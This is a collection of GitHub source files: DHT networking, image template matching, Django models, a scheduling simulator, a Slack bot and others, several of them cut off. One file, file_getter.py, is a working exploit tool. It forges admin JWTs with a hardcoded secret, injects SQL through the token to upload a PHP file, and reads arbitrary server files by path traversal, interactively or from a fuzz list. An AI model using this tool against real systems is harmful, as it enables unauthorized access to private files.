else:\n raise DHT.NetworkError(\"Cannot boot DHT\")\n with self.rpc_states as states:\n del states[hash_id]\n\n self.iterative_find_nodes(random_id(), boot_peer=boot_peer)\n if len(self.buckets.nearest_nodes(self.peer.id)) < 1:\n time.sleep(Config.SLEEP_WAIT * 3)\n self.iterative_find_nodes(random_id(), boot_peer=boot_peer)\n time.sleep(Config.SLEEP_WAIT)\n if len(self.buckets.nearest_nodes(self.peer.id)) < 1:\n raise DHT.NetworkError(\"Cannot boot DHT\")\n self.boot_peer = boot_peer\n l.info(\"DHT is bootstrapped\")\n\n def get(self, key, encoding=None):\n if not encoding:\n encoding = self.encoding\n hashed_key = hash_function(msgpack.dumps(key))\n res = None\n if self.data:\n with self.data as data:\n if hashed_key in data:\n res = data[hashed_key]\n if res is None:\n res = self.iterative_find_value(hashed_key)\n if encoding:\n res = msgpack.loads(res, encoding=encoding)\n return res\n\n def __getitem__(self, key):\n return self.get(key)\n\n def set(self, key, value, encoding=None):\n if not encoding:\n encoding = self.encoding\n 
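# Editor's note (illustrative usage, not from the original repo):\n # dht.set(\"greeting\", {\"hi\": 1}, encoding=\"utf-8\")\n # value = dht.get(\"greeting\", encoding=\"utf-8\")\n # Keys are msgpack-serialized before hashing (hashed_key below), so any\n # msgpack-serializable key works; values round-trip through msgpack too.\n 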
if encoding:\n value = msgpack.dumps(value, encoding=encoding)\n hashed_key = hash_function(msgpack.dumps(key))\n nearest_nodes = self.iterative_find_nodes(hashed_key)\n if self.data:\n with self.data as data:\n data[hashed_key] = value\n for node in nearest_nodes:\n node.store(hashed_key, value, dht=self, peer_id=self.peer.id)\n\n def __setitem__(self, key, value):\n self.set(key, value)\n","repo_name":"pombreda/dht3k","sub_path":"dht3k/pydht.py","file_name":"pydht.py","file_ext":"py","file_size_in_byte":14020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9434843200","text":"import cv2\nimport numpy as np\nimport os\n\n\n#Due to my limited dataset and poor effects for weights trained on public datasets,\n# I added template matching and cut objects from my own dataset as templates to classify changed targets.\n\ndef match_template(img, temp_path_1, temp_path_2, threshold1,threshold2):\n list1 = []\n list2 = []\n if len(img.shape) == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n file_list = os.listdir(temp_path_1)\n for file in file_list:\n #print(file)\n template = cv2.imread(os.path.join(temp_path_1,file),0) #read templates(gray image)\n w, h = template.shape[::-1]\n #print(w,h)\n img_n = cv2.resize(img,(w,h))\n res = cv2.matchTemplate(img_n, template, cv2.TM_CCOEFF_NORMED) #template matching\n list1.append(res)\n maxVal1 = max(list1)\n print(maxVal1)\n print('now to another class')\n #detect another class\n file_list = os.listdir(temp_path_2)\n for file in file_list:\n # print(file)\n template = cv2.imread(os.path.join(temp_path_2, file), 0)\n w, h = template.shape[::-1]\n img_n = cv2.resize(img, (w, h))\n res = cv2.matchTemplate(img_n, template, cv2.TM_CCOEFF_NORMED)\n list2.append(res)\n # print(res)\n maxVal2 = max(list2)\n print(maxVal2)\n if maxVal1 > threshold1:\n text = 'person'\n elif maxVal2 > threshold2:\n text = 'car'\n else:\n text = None\n print(text)\n\n return text\n\n\nif __name__ == '__main__':\n img = cv2.imread('bbox/1.jpg')#changed areas, may include object I need\n temp_path_1 = 'temp/template_img/car/' #path to templates\n temp_path_2 = 'temp/template_img/infred_person/'\n text = match_template(img,temp_path_1,temp_path_2,0.5,0.5)#threshold value can be adjusted\n","repo_name":"yusz07/Find-Changes-between-Two-Images","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"13036067109","text":"from django.db import models\nfrom core.models import mixins as core_mixins\nfrom .markdown_scenario import MarkdownScenarioStatus\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.utils import timezone\n\nfrom core.utils.ordered_enum import OrderedEnum\n\n\nclass MarkdownEventScopeFileInsertType(models.TextChoices):\n ADD = \"ADD\"\n REPLACE = \"REPLACE\"\n\n\nclass MarkdownEventType(models.TextChoices):\n RESET = \"RESET\"\n SEASONAL = \"SEASONAL\"\n\n\nclass MarkdownEventStatus(OrderedEnum):\n ARCHIVED = \"ARCHIVED\"\n SETUP = \"SETUP\"\n PENDING = \"PENDING\"\n DONE = \"DONE\"\n\n\nclass MarkdownArticleGroupType(models.TextChoices):\n NORMAL = \"NORMAL\"\n\n\nclass MarkdownEvent(core_mixins.TimeStampMixin, models.Model):\n\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n slug = models.SlugField(null=True, blank=True)\n after_season_start_date = models.DateField(blank=True, null=True)\n 
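# NOTE (editor's comment, not part of the original model): these lifecycle\n # dates are all optional (null=True, blank=True); when present they bound\n # the markdown window for the event.\n 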
season_start_date = models.DateField(blank=True, null=True)\n end_date = models.DateField(blank=True, null=True)\n type = models.CharField(\n max_length=50,\n choices=MarkdownEventType.choices,\n default=MarkdownEventType.RESET,\n )\n status = models.CharField(\n max_length=50,\n choices=MarkdownEventStatus.choices,\n default=MarkdownEventStatus.SETUP,\n )\n\n last_modified = models.DateTimeField(default=timezone.now)\n\n @property\n def articles(self):\n return [scope.article_id for scope in self.scope.all()]\n\n @property\n def last_activity_time(self):\n last_activity_dates = [scenario.updated_at for scenario in self.scenarios.all()]\n last_activity_dates = sorted(\n last_activity_dates,\n reverse=True,\n )\n\n return last_activity_dates[0] if last_activity_dates else self.updated_at\n\n def __str__(self):\n return str(self.name)\n\n class Meta:\n ordering = [\"id\"]\n\n\nclass MarkdownEventScope(models.Model):\n event = models.ForeignKey(\n \"core.MarkdownEvent\",\n on_delete=models.CASCADE,\n related_name=\"scope\",\n )\n article = models.ForeignKey(\n \"core.Article\",\n on_delete=models.CASCADE,\n related_name=\"scope\",\n )\n article_group = models.ForeignKey(\n \"core.MarkdownArticleGroup\",\n on_delete=models.SET_NULL,\n default=None,\n null=True,\n blank=True,\n related_name=\"scope\",\n )\n stores = models.JSONField(default=list, null=True, blank=True)\n call_in = models.BooleanField(\n default=False,\n )\n item_md_end_date = models.DateField(null=True, blank=True)\n clone_article = models.ForeignKey(\n \"core.Article\",\n on_delete=models.CASCADE,\n related_name=\"scope_clone_article\",\n null=True,\n blank=True,\n )\n cost_overwrite = models.DecimalField(\n decimal_places=2, max_digits=10, null=True, blank=True\n )\n vendor_funding = models.DecimalField(\n decimal_places=2, max_digits=10, null=True, blank=True\n )\n discount_covered = models.FloatField(\n validators=[MinValueValidator(0), MaxValueValidator(1)],\n null=True,\n blank=True,\n )\n online_market = models.BooleanField(\n default=True,\n )\n discount_group = models.IntegerField(null=True, blank=True)\n\n @property\n def store_count(self):\n return len(list(self.stores))\n\n class Meta:\n unique_together = (\"event\", \"article\", \"article_group\")\n\n\nclass MarkdownArticleGroup(models.Model):\n class MarkdownArticleGroupStatus(OrderedEnum):\n ARCHIVED = \"ARCHIVED\"\n ACTIVE = \"ACTIVE\"\n PAUSED = \"PAUSED\"\n\n class MarkdownArticleGroupApprovalStatus(OrderedEnum):\n DRAFT = \"DRAFT\"\n SUBMITTED = \"SUBMITTED\"\n APPROVED = \"APPROVED\"\n\n name = models.CharField(max_length=50)\n slug = models.SlugField(null=True, blank=True)\n start_date = models.DateField(blank=True, null=True)\n type = models.CharField(\n max_length=50,\n choices=MarkdownArticleGroupType.choices,\n default=MarkdownArticleGroupType.NORMAL,\n )\n event = models.ForeignKey(\n \"core.MarkdownEvent\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n related_name=\"article_groups\",\n )\n status = models.CharField(\n max_length=50,\n choices=MarkdownArticleGroupStatus.choices,\n default=MarkdownArticleGroupStatus.ACTIVE,\n )\n approval_status = models.CharField(\n max_length=50,\n choices=MarkdownArticleGroupApprovalStatus.choices,\n default=MarkdownArticleGroupApprovalStatus.DRAFT,\n )\n\n @property\n def articles(self):\n return self.scope.all().values_list(\"article\", flat=True)\n\n @property\n def markdown_event_end_date(self):\n return self.event.end_date\n\n @property\n def scenario_max_status(self):\n scenarios = 
self.scenarios.all()\n statuses = [MarkdownScenarioStatus(scenario.status) for scenario in scenarios]\n\n return max(statuses) if len(statuses) > 0 else None\n\n def __str__(self):\n return str(self.name)\n\n class Meta:\n ordering = [\"id\"]\n","repo_name":"kennedydaniel/markdowns-models","sub_path":"models/markdown_event.py","file_name":"markdown_event.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36351889732","text":"\"\"\"Module containing the scheduling simulator (engine).\n\nThe simulator takes a DAG of tasks and a number of resources, and\ncomputes how the tasks would execute following their priorities.\n\"\"\"\n\nimport heapq # for heaps (it implements only min-heaps)\n\n\ndef simulate(graph, num_resources, debug=False):\n \"\"\"Simulation engine.\n\n Parameters\n ----------\n graph : Graph object\n DAG of tasks to run\n num_resources : int\n Number of identical resources to simulate\n debug : bool [default = False]\n True if debug messages should be printed\n\n Returns\n -------\n int\n Makespan\n \"\"\"\n print('* Starting the simulation *')\n if debug:\n print(f'- Graph of {len(graph.vertices)} tasks running on' +\n f' {num_resources} resources')\n\n # Setup:\n # - Creates a list of free resources\n free_resources = [i for i in range(num_resources)]\n # - Puts all available tasks (top tasks) in the priority queue\n priority_queue = list()\n for task in graph.vertices.values():\n if not task.predecessors:\n priority_queue.append(task)\n if debug:\n print(f'- {task} is ready to run')\n heapq.heapify(priority_queue)\n # - Sets the start time as zero\n time = 0\n # - Creates the bootstrapping event in the event queue of the simulator\n # format of an event: (time, task id, resource id)\n events = [(time, None, None)]\n\n # Simulation runs while there are events to handle\n # Steps:\n # 1. remove the first event, see if there are any new free tasks\n # 2. 
schedule available tasks while there are available resources\n while events:\n # Step 1\n time, task_id, res_id = heapq.heappop(events)\n if task_id != None:\n # event: task finished running\n task = graph.vertices[task_id]\n if debug:\n print(f'[t={time}]: END {task}, resource {res_id}')\n\n # removes the task from the predecessors of its successors\n for succ_id in task.successors:\n successor = graph.vertices[succ_id]\n successor.predecessors.remove(task_id)\n # if it has no predecessors, it is free to run\n if not successor.predecessors:\n heapq.heappush(priority_queue, successor)\n if debug:\n print(f'- {successor} is now ready to run')\n\n # adds the resource to the list of available resources\n free_resources.append(res_id)\n\n # Step 2\n while free_resources and priority_queue:\n # pops the first free resource and free task\n res_id = free_resources.pop(0)\n task = heapq.heappop(priority_queue)\n end_time = time + task.load\n # creates the event for the task's execution\n heapq.heappush(events, (end_time, task.id, res_id))\n if debug:\n print(f'[t={time}]: START {task}, resource {res_id}')\n\n # No more events\n print(f'* Total execution time (makespan) = {time}\\n')\n return time\n","repo_name":"llpilla/study-task-scheduling","sub_path":"simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9792110098","text":"from account import Account\nfrom bank import Bank\n\ndef main():\n a1 = Account()\n a2 = Account()\n a3 = Account()\n a1.init(1, 1000, \"alex\")\n a2.init(2, 2500, \"kate\")\n a3.init(3, 500, \"vova\")\n\n tpl = (a1, a2, a3)\n\n print(Bank.show_all_account(tpl))\n print(f\"Total balance is {Bank.sum_all_balance(tpl)}\")\n print(f\"After month:{Bank.calc_sum_after_month(tpl)}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Sibirava/Lesson17","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9345179976","text":"import math\n\nm = int(input())\nn = int(input())\ngraph = []\nfound = False\n\nfor i in range(m):\n graph.append([int(x) for x in input().split()])\n\ndef findNodes(num):\n pairs = []\n for i in range(1, math.ceil(math.sqrt(num) + 1)):\n if num % i == 0:\n p = num // i\n if (i == m and p == n or i == n and p == m):\n global found\n found = True\n\n if (i <= m and p <= n):\n pairs.append((i, p))\n if (i <= n and p <= m):\n pairs.append((p, i))\n return pairs\n\ndef BFS():\n visited = dict()\n queue = []\n\n queue.append((1, 1))\n visited[(1, 1)] = True\n while queue:\n global found\n if found:\n return \"yes\"\n\n front = queue.pop(0)\n\n if front == (m, n):\n return \"yes\"\n\n for f in findNodes(graph[front[0] - 1][front[1] - 1]):\n if not f in visited:\n queue.append(f)\n visited[f] = True\n return \"no\"\n\nprint(BFS())","repo_name":"aqts-aqts/ccc-solutions","sub_path":"2020/S2.py","file_name":"S2.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30152300466","text":"import os\r\nimport vcmiutil\r\nimport vcmiconf\r\n\r\ndef fixReaddirRUsage():\r\n\treplacements = [ vcmiutil.ReplacementEntry(\"# if !defined(__CYGWIN__)\\\\\", \"#if 0\\\\\") ]\r\n\t\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + 
\"/libs/filesystem/src/operations.cpp\", replacements)\r\n\r\ndef fixBrokenFeatureDetectionInPthreadMutex():\r\n\treplacements = [ vcmiutil.ReplacementEntry(\"#if (defined(_POSIX_TIMEOUTS) && (_POSIX_TIMEOUTS-0)>=200112L) \\\\\", \"#if 0 \\\\\") ]\r\n\treplacements2 = [ vcmiutil.ReplacementEntry(\"#if (defined _POSIX_TIMEOUTS && (_POSIX_TIMEOUTS-0)>=200112L) \\\\\", \"#if 0 \\\\\") ]\r\n\t\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/boost/thread/pthread/mutex.hpp\", replacements)\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/boost/thread/pthread/recursive_mutex.hpp\", replacements2)\r\n\t\r\ndef fixBrokenEpollDetectionOnOldApi():\r\n\treplacements = [ vcmiutil.ReplacementEntry(\"#if defined(EPOLL_CLOEXEC)\", \"#if defined(EPOLL_CLOEXEC) && __ANDROID_API__ >= 21\") ]\r\n\t\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/boost/asio/detail/impl/epoll_reactor.ipp\", replacements)\r\n\r\nfixBrokenFeatureDetectionInPthreadMutex()\r\nfixReaddirRUsage()\r\nfixBrokenEpollDetectionOnOldApi()","repo_name":"vcmi/vcmi-android","sub_path":"fix_boost_files.py","file_name":"fix_boost_files.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"67"} +{"seq_id":"17827788317","text":"import pandas as pd\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers.embeddings import Embedding\nfrom keras_preprocessing.text import one_hot\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('../data/urldata.csv')\nurl = np.array(df['url'])\nlabel1 = np.array(df['label'])\nsiz = int(0.1 * len(label1))\nurl = url[0:siz]\n\n\n# no of dots in url\ndef label_encode(label):\n enclabel = []\n for i in label:\n if i == \"bad\":\n enclabel.append(0)\n else:\n enclabel.append(1)\n return enclabel\n\n\n# one hot encode\nencoded_docs = [one_hot(d, 20 * len(url)) for d in url]\nleng = []\nfor i in encoded_docs:\n leng.append(len(i))\nprint(max(leng))\npadded_docs = pad_sequences(encoded_docs, maxlen=max(leng), padding='post')\n\nlabel = label_encode(label1)\nlabel = label[0:siz]\nla = label\nlabel = np_utils.to_categorical(label, 2)\n\nmodel = Sequential()\nmodel.add(Embedding(siz, 32, input_length=max(leng)))\ninput_array = padded_docs\nmodel.compile('rmsprop', 'mse')\noutput_array = model.predict(input_array)\nx, y = [], []\nfor i in output_array:\n pca = PCA(n_components=2)\n a = pca.fit(i)\n a, b = pca.singular_values_\n x.append(a)\n y.append(b)\n\nfig = plt.figure()\nax = Axes3D(fig)\nprint(label.shape)\nax.scatter(x, y, la)\nplt.xlabel('xcomponet')\nplt.ylabel('ycomponet')\n# plt.zlabel('label')\n\n\nplt.show()\n\nout_train, out_test, label_train, label_test = train_test_split(output_array, label, test_size=0.05, random_state=42)\nnp.save(\"../matpre/embtrain.npy\", out_train)\nnp.save(\"../matpre/embtest.npy\", out_test)\nnp.save(\"../matpre/latrain.npy\", label_train)\nnp.save(\"../matpre/latest.npy\", label_test)\n","repo_name":"shan1322/phishing-classifier","sub_path":"code/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31472619710","text":"# 
-*- coding: utf-8 -*-\n\nfrom message import IntegrationEvent\n\n\nclass CMCACLPermissionUpdate(IntegrationEvent):\n def __init__(self, deploy, tag=''):\n super(CMCACLPermissionUpdate, self).__init__()\n self._deploy = deploy\n self._tag = tag\n self._event_name = 'CMCACLPermissionUpdateIntegrationEvent'\n\n @property\n def body(self):\n content = super(CMCACLPermissionUpdate, self).body\n content['deploy'] = self._deploy\n content['tag'] = self._tag\n return content\n\n\nclass CMCACLRoleUpdate(IntegrationEvent):\n def __init__(self, deploy, tag=''):\n super(CMCACLRoleUpdate, self).__init__()\n self._deploy = deploy\n self._tag = tag\n self._event_name = 'CMCACLRoleUpdateIntegrationEvent'\n\n @property\n def body(self):\n content = super(CMCACLRoleUpdate, self).body\n content['deploy'] = self._deploy\n content['tag'] = self._tag\n return content\n\n\n","repo_name":"futsystems/cmc.website","sub_path":"eventbus/acl_config_update.py","file_name":"acl_config_update.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"8123516552","text":"import base64\nimport io\nfrom fdk import response\nimport json\nimport logging\nimport oci\n\nfrom .base import BaseDispatch\nfrom .dispatch import Dispatcher\nfrom .service import SlackService, Agent, Channel\nfrom .text import Text\n\n\nLOG = logging.getLogger(__name__)\n\nSERVICE = None\nTOKEN = None\nTEAM = None\nNAMESPACE, BUCKET = None, None\n\n\ndef init(cfg):\n global SERVICE, TOKEN, TEAM, NAMESPACE, BUCKET\n if TEAM is None:\n TEAM = load_secret(cfg, 'TEAM')\n if SERVICE is None:\n SERVICE = SlackService(team=TEAM,\n bot_oauth=load_secret(cfg, 'BOT_OAUTH'),\n user_oauth=load_secret(cfg, 'USER_OAUTH'))\n if TOKEN is None:\n TOKEN = load_secret(cfg, 'TOKEN')\n if NAMESPACE is None:\n NAMESPACE = cfg['NAMESPACE']\n if BUCKET is None:\n BUCKET = cfg['BUCKET']\n\n\ndef load_secret(cfg, setting):\n \"\"\"If we have KMS_KEY and KMS_EP defined, use those to decrypt the given secret\n\n Otherwise, pull the value out as plaintext.\"\"\"\n value = cfg.get(setting)\n if value is None:\n return value\n\n # Retrieve key OCID and endpoint\n key = cfg.get(\"KMS_KEY\")\n endpoint = cfg.get(\"KMS_EP\")\n\n if key is None and endpoint is None:\n return value\n\n # Create decryption client\n signer = oci.auth.signers.get_resource_principals_signer()\n client = oci.key_management.KmsCryptoClient({}, endpoint, signer=signer)\n\n # The plaintext is returned as base64-encoded data. 
Decrypt it (providing a byte sequence)\n # and then produce a UTF-8 string from the result.\n return base64.b64decode(client.decrypt(oci.key_management.models.DecryptDataDetails(\n key_id=key, ciphertext=value)).data.plaintext).decode(\"utf-8\")\n\n\nclass Bot(BaseDispatch):\n pass\n\n\ndef handle(ctx, data: io.BytesIO, bot_class=Bot):\n init(ctx.Config())\n try:\n args = json.loads(data.getvalue())\n LOG.debug('args are %s', {k: args[k] for k in args if k != 'token'})\n\n token = args.get('token')\n if token != TOKEN:\n return response.Response(ctx, status_code=401)\n\n if args.get('challenge') is not None:\n return response.Response(ctx, status_code=200, response_data=args['challenge'])\n\n team = args.get('team_id')\n if team != TEAM:\n return response.Response(ctx, status_code=404)\n\n if SERVICE is None:\n return response.Response(ctx, status_code=404)\n\n if args.get('type') == 'event_callback':\n event = args.get('event', {})\n\n if event.get('type') == 'app_mention':\n pass\n elif event.get('type') == 'message' and event.get('subtype') is None:\n\n text = Text.parse(event.get('text', ''), srv=SERVICE)\n text.ts = event.get('ts')\n sender = Agent(id=event.get('user'))\n channel = Channel(id=event.get('channel'))\n if event.get('channel_type') == 'group':\n channel = channel.replace(is_private=True)\n elif event.get('channel_type') == 'im':\n channel = channel.replace(is_im=True)\n receivers = [Agent(id=rcv, is_bot=True) for rcv in args.get('authed_users', [])]\n\n rp = oci.auth.signers.get_resource_principals_signer()\n dispatcher = Dispatcher(srv=SERVICE,\n default=bot_class, factory=bot_class.load,\n signer=rp, namespace=NAMESPACE, bucket=BUCKET)\n dispatcher.dispatch(sender=sender, channel=channel, receivers=receivers, text=text)\n\n except Exception as e:\n LOG.exception(\"Problem during dispatch: %r\", e)\n return response.Response(ctx, status_code=500)\n\n return response.Response(ctx, status_code=200)\n","repo_name":"jan-g/faastm","sub_path":"slacker/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8409312981","text":"import requests\nimport jwt\nimport re\nimport argparse\nimport time\n\n##############################################\n###################CONFIG#####################\nURL = \"http://127.0.0.1\"\nfilename_to_upload = \"badfile.php\"\nfile_content = \"\"\nuser_id = 31337\nis_public = 0\n\ntimeout = 2\n\nlogin = \"admin\"\nmail = \"admin\"\nrole = \"admin\"\nip = \"127.0.0.1\"\n##############################################\n\nurl = f\"{URL}/modules/upload.php\"\n\nfiles = {\n 'image': (filename_to_upload,file_content, 'image/jpeg')\n}\n\ndef generate_token(id):\n encoded_jwt = jwt.encode({\"id\": f\"{id}\",\n \"login\": f\"{login}\",\n \"mail\": f\"{mail}\",\n \"role\": f\"{role}\",\n \"ip\": f\"{ip}\"},\n \"supersecret\", algorithm=\"HS256\")\n return encoded_jwt\n\ndef get_last_id():\n encoded_jwt = generate_token(user_id)\n req = requests.get(f\"{URL}\", headers={\"Cookie\": f\"user_token={encoded_jwt}\"})\n images = re.findall(r\"image\\.php\\?id=[0-9]{1,7}\",req.text)\n last_id = str(images[len(images)-1])[13:]\n return last_id\n\n\ndef interactive(jwt_print, file_print, file_download,add_path):\n print(\"=\" * 50)\n print()\n while True:\n file = str(input('file > '))\n if add_path:\n file = \"../../../../../..\" + file\n encoded_jwt = generate_token(f\"4), ('{file}', {is_public}, {user_id}\")\n requests1 = requests.post(url, 
headers={\"Cookie\": f\"user_token={encoded_jwt}\"}, files=files)\n\n if \"\\\"error\\\":false\" in requests1.text:\n print(\">>> File uploaded\")\n else:\n print(\">>> File not uploaded\")\n break\n\n last_id = get_last_id()\n usual_jwt = generate_token(f'{user_id}')\n\n try:\n requests2 = requests.get(f'{URL}/image.php?id={last_id}',\n headers={'Cookie': f'user_token={usual_jwt}'}, timeout=timeout)\n if '403' in requests2.text:\n print('>>> File not found')\n else:\n print('>>> File exist!' + \"\\n\")\n print(f'>>> URL: {URL}/image.php?id={last_id}' + \"\\n\")\n\n if jwt_print:\n print(f'>>> jwt: {usual_jwt}' + \"\\n\")\n if file_print:\n print(\">\"*10 + \" FILE CONTENT \" + \"<\"*10 + \"\\n\")\n print(requests2.text)\n print(\">\"*19 + \"<\"*19 + \"\\n\")\n if file_download:\n print(\">>> File downloaded\" + \"\\n\")\n f = open(file.replace('/','').replace('.',''), 'w')\n f.write(requests2.text)\n f.close()\n\n except BaseException:\n print('>>> File exist but we don`t have permissions to read')\n print()\n\ndef fuzz(list,jwt_print, file_print, file_download,add_path):\n print(\"=\" * 50)\n print()\n with open(list) as f:\n lines = f.readlines()\n lines = [line.rstrip() for line in lines]\n lines = [line for line in lines]\n for line in lines:\n if add_path:\n file = \"../../../../../..\" + line\n else:\n file = line\n encoded_jwt = generate_token(f\"4), ('{file}', {is_public}, {user_id}\")\n requests1 = requests.post(url, headers={\"Cookie\": f\"user_token={encoded_jwt}\"}, files=files)\n\n last_id = get_last_id()\n usual_jwt = generate_token(f'{user_id}')\n\n try:\n requests2 = requests.get(f'{URL}/image.php?id={last_id}',\n headers={'Cookie': f'user_token={usual_jwt}'}, timeout=timeout)\n if requests2.status_code == 503:\n print(\"503 error\")\n\n elif '403' in requests2.text:\n pass\n print(f'>>> File {file} not found')\n\n elif len(requests2.text) > 1:\n print(f'>>> File {file} exist!' 
+ \"\\n\")\n print(f'>>> URL: {URL}/image.php?id={last_id}' + \"\\n\")\n\n if jwt_print:\n print(f'>>> jwt: {usual_jwt}' + \"\\n\")\n if file_print:\n print(\">\" * 10 + \" FILE CONTENT \" + \"<\" * 10 + \"\\n\")\n print(requests2.text)\n print(\">\" * 19 + \"<\" * 19 + \"\\n\")\n if file_download:\n print(\">>> File downloaded\" + \"\\n\")\n f = open(file.replace('/', '').replace('.', ''), 'w')\n f.write(requests2.text)\n f.close()\n\n except BaseException:\n print(f'>>> File {file} exist but we don`t have permissions to read')\n\n\n\n\n\n\n\n\n\ndef print_banner():\n print(\"\"\"\n ______ _ _ _____ _ _\n | ____(_) | / ____| | | | |\n | |__ _| | ___ | | __ ___| |_| |_ ___ _ __\n | __| | | |/ _ \\ | | |_ |/ _ \\ __| __/ _ \\ '__|\n | | | | | __/ | |__| | __/ |_| || __/ |\n |_| |_|_|\\___| \\_____|\\___|\\__|\\__\\___|_|\n\n This tool was created to exploit Arbitrary File\n Reading via SQL injection.\n \n \"\"\")\n\n\nhelp = \"\"\"\n MODES:\n --interactive Interactive mode to search for files manually\n --fuzz \"list.txt\" Fuzz mode to search for files from list \n INTERACTIVE MODE\n VERBOSITY OPTIONS: \n --jwt Prints JWT\n --printFile Prints file\n OTHER:\n --download Downloads file if it exists\n FUZZ MODE\n --addPath Add path traversal \"../../../../\"\n --help Print this page \n\"\"\"\n\n\nparser = argparse.ArgumentParser(add_help=False)\n\nparser.add_argument(\"--interactive\",action=\"store_true\")\nparser.add_argument(\"--fuzz\",default=\"\")\nparser.add_argument(\"--help\",action=\"store_true\")\nparser.add_argument(\"--jwt\",action=\"store_true\")\nparser.add_argument(\"--printFile\", action=\"store_true\")\nparser.add_argument(\"--download\", action=\"store_true\")\nparser.add_argument(\"--addPath\", action=\"store_true\")\n\nargs = parser.parse_args()\ninteractive_mode = args.interactive\nfuzz_mode = args.fuzz\njwt_print = args.jwt\nfile_print = args.printFile\nfile_download = args.download\nadd_path = args.addPath\nhelpme = args.help\n\nprint_banner()\n\nif (not (interactive_mode or fuzz_mode)) or helpme:\n print(help)\n quit()\n\nif interactive_mode:\n interactive(jwt_print, file_print, file_download,add_path)\n\nif fuzz_mode:\n fuzz(fuzz_mode,jwt_print, file_print, file_download,add_path)\n","repo_name":"MiichaelKlimenko/TestTaskTools","sub_path":"file_getter.py","file_name":"file_getter.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6537511450","text":"#!/usr/bin/env python3\n\n########################################################\n#\n# A simple middleware to submit a scan report\n# assessment results\n#\n# Usage:\n# python sar_etl.py [-s ] [-d ]\n#\n# Example:\n# python sar_etl.py eCXZbZwmBrtD5hgrJ8ptmJfvDA5vlDcc http://localhost:8888/ -s 132 -d f7b0d84e-397c-43de-bb1f-421afa467993\n# Accessing:\n# curl localhost:8888\n#\n#\n# Optional arguments:\n# -h, --help show this help message and exit\n# -d deployment uuid\n# -s system id\n# -v, --verbose output more information\n#\n################################################################\n\n# Parse command-line arguments\nimport click\n\n# Web stuff\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib import request, parse\n\n# System stuff\nimport os\nimport platform\nimport re\nimport signal\nimport sys\n\n# JSON and other data handling\nimport json\nimport random\nimport uuid\n\n# Default constants\nGOVREADYHOST = \"http://localhost:8000\"\nSPACER = \"\\n====\\n\"\n\n# Gracefully exit on 
control-C\nsignal.signal(signal.SIGINT, lambda signal_number, current_stack_frame: sys.exit(0))\n\n# Define a fatal error handler\nclass FatalError(Exception):\n pass\n\n# Define a halted error handler\nclass HaltedError(Exception):\n pass\n\n# Define a non-zero return code error handler\nclass ReturncodeNonZeroError(Exception):\n def __init__(self, completed_process, msg=None):\n if msg is None:\n # default message if none set\n msg = \"An external program or script returned an error.\"\n super(ReturncodeNonZeroError, self).__init__(msg)\n self.completed_process = completed_process\n\n# Commandline arguments\n@click.command()\n@click.argument('apikey', default=None)\n@click.argument('sar_url', default=None)\n@click.option('-s', default=None)\n@click.option('-d', default=None)\ndef main(apikey, sar_url, s, d):\n\n # Set system_id, deployment_uuid\n system_id = s\n deployment_uuid = d\n # deployment_id = 226\n\n #build query\n url_query = f\"?system_id={system_id}&deployment_uuid={deployment_uuid}\"\n\n # Get SAR from SAR Service\n print(SPACER)\n print(f\"Retrieving SAR from service: {sar_url}{url_query}\")\n handler = request.urlopen(f\"{sar_url}{url_query}\")\n sar = json.loads(handler.read().decode( 'utf-8' ))\n # print(sar)\n\n system_id = sar[\"metadata\"][\"system_id\"]\n\n if deployment_uuid is not None:\n d_uuid_uuid = uuid.UUID(f'urn:uuid:{deployment_uuid}')\n else:\n d_uuid_uuid = None\n # Submit sar data to GovReady-q API\n data = {\n \"system_id\": system_id,\n \"deployment_uuid\": d_uuid_uuid,\n \"sar_json\": json.dumps(sar)\n }\n\n from pprint import pprint\n # pprint(data)\n data = bytes( parse.urlencode( data ).encode() )\n\n # POST retrieved SAR data to GovReady-Q via API\n \"\"\"\n curl --header \"Authorization: \" \\\n -F 